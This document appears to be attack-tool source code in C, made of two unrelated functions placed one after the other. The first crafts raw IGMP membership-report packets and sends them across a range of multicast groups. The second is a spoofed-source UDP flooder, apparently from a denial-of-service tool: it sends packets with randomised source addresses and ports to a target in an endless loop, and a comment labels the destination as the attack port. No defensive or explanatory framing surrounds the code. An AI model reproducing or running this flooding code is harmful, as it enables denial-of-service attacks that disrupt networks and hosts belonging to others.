int main(int argc, char *argv[]) { int fd; byte_t pkt[32]; int ttl; in_addr_t src_ip, dst_ip, group_ip; struct sockaddr_ll ll; unsigned count; unsigned ifindex; if (argc < 6) { printf("Usage igmp_scan <ttl> <iface> <src> <dest> <count>\n"); exit(1); } fd = socket(PF_PACKET, SOCK_DGRAM, ETH_P_IP); if (fd == -1) { perror("eth_open"); exit(1); } ttl = atoi(argv[1]); ifindex = iface_index(argv[2]); if (ifindex == -1) { printf("Bad interface name '%s'\n", argv[2]); exit(1); } src_ip = inet_addr(argv[3]); dst_ip = inet_addr(argv[4]); count = atoi(argv[5]); do { group_ip = dst_ip; memset(pkt, 0, sizeof(pkt)); s_8 (pkt, 0, 0x46); s_16(pkt, 2, sizeof(pkt)); s_8 (pkt, 8, ttl); s_8 (pkt, 9, 2); s_32(pkt, 12, htonl(src_ip)); s_32(pkt, 16, htonl(dst_ip)); s_32(pkt, 20, 0x94040000); /* router alert */ s_8 (pkt, 24, 0x16); /* membership report */ s_32(pkt, 28, htonl(group_ip)); s_16(pkt, 26, ip_sum(pkt+24, 8)); /* igmp csum */ s_16(pkt, 10, ip_sum(pkt, 32)-0x100); /* ip csum */ ll.sll_family = AF_PACKET; ll.sll_protocol = htons(ETH_P_IP); ll.sll_ifindex = ifindex; ll.sll_hatype = htons(ARPHRD_ETHER); ll.sll_pkttype = PACKET_MULTICAST; ll.sll_halen = 6; ll.sll_addr[0] = 1; ll.sll_addr[1] = 0; s_32(ll.sll_addr, 2, (0x5e<<24) | (ntohl(group_ip) & 0x7FFFFF)); sendto(fd, pkt, sizeof(pkt), 0, (struct sockaddr *)&ll, sizeof(ll)); dst_ip = htonl(ntohl(dst_ip)+0x10000); if ((count % 10) == 0) { usleep(1); } } while (--count); return 0; }
int udp_send( ) { struct ip *ipH; struct udphdr *udpH; char *packet; int rawsock, sport; struct sockaddr_in sin; unsigned long saddr, daddr; char ip1[4], ip2[4], ip3[4], ip[4]; int pkgsize = sizeof (struct ip) + sizeof(struct udphdr) + config.udp_pkgsize; packet = (char *) malloc(sizeof (struct ip) + sizeof(struct udphdr) + config.udp_pkgsize); ipH = (struct ip *) packet; udpH = (struct udphdr *) (packet + sizeof(struct ip)); memset(packet, 0, pkgsize); daddr = inet_addr(config.udp_targetip); // ip header ipH->ip_v = 4; /* version */ ipH->ip_hl = 5; /* header length */ ipH->ip_tos = 0x00; /* type of service */ //ipH->ip_len = pkgsize; /* total length */ ipH->ip_ttl = 255; /* time to live */ ipH->ip_off = 0; /* fragment offset field */ ipH->ip_id = htons(random_int(1, 65535)); /* identification */ ipH->ip_p = IPPROTO_UDP; /* protocol */ ipH->ip_sum = 0; /* checksum */ //ipH.ip_src.s_addr = saddr; /* source address */ ipH->ip_dst.s_addr = daddr; /* dest address */ //ipH.ip_sum = ip_sum((unsigned short*)&ipH,sizeof(ipH));//检验和 // udp header //udpH.uh_sport = htons( sport ); //16位源端口 udpH->uh_dport = htons( config.udp_targetport ); //16位目的端口 udpH->uh_ulen = htons(sizeof(struct udphdr ) + config.udp_pkgsize); //16位UDP包长度 //udpH.uh_sum = 0; //16位校验和 //udpH.uh_sum = DoS_cksum((unsigned short*)&udp.udpH, pkgsize);//UDP校验和 sin.sin_family = AF_INET; //sin.sin_port = htons(53); //攻击端口 sin.sin_addr.s_addr = daddr; rawsock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW); if( rawsock < 0 ) { printf("[-]Error to open socket.\n"); return 1; } const int optVal = 1; setsockopt(rawsock, SOL_SOCKET,SO_REUSEADDR | SO_BROADCAST, &optVal, sizeof(optVal)); if( setsockopt( rawsock , IPPROTO_IP , IP_HDRINCL , &optVal , sizeof( optVal ) ) < 0 ) { printf("[-]Error to setsockopt to the socket.\n"); return 1; } printf("packet=%d, len=%d, pkgsize=%d\nsending ...\n", sizeof(packet), config.udp_pkgsize, pkgsize ); while(1) { saddr = ( strcmp(config.udp_sourceip, "*") == 0 ) ? random_lip() : inet_addr((config.udp_sourceip)); sport = config.udp_sourceport == 0 ? random_int(1, 65535) : config.udp_sourceport; ipH->ip_id = htons(random_int(1, 65535)); ipH->ip_src.s_addr = saddr; ipH->ip_sum = ip_sum((unsigned short*)&ipH, sizeof(ipH)); udpH->uh_sport = htons( sport ); ipH->ip_len = pkgsize; //udpH->uh_sum = ip_sum((unsigned short*)&udpH, sizeof(udpH)); if( sendto( rawsock , packet, pkgsize , 0 , ( struct sockaddr *) &sin , sizeof(sin)) < 0 ) { printf("[-]Error to sendto : %s[%d].\n" , strerror(errno), errno ); return 1; } if (config.udp_sleeptime > 0) usleep(config.udp_sleeptime); } return 0; }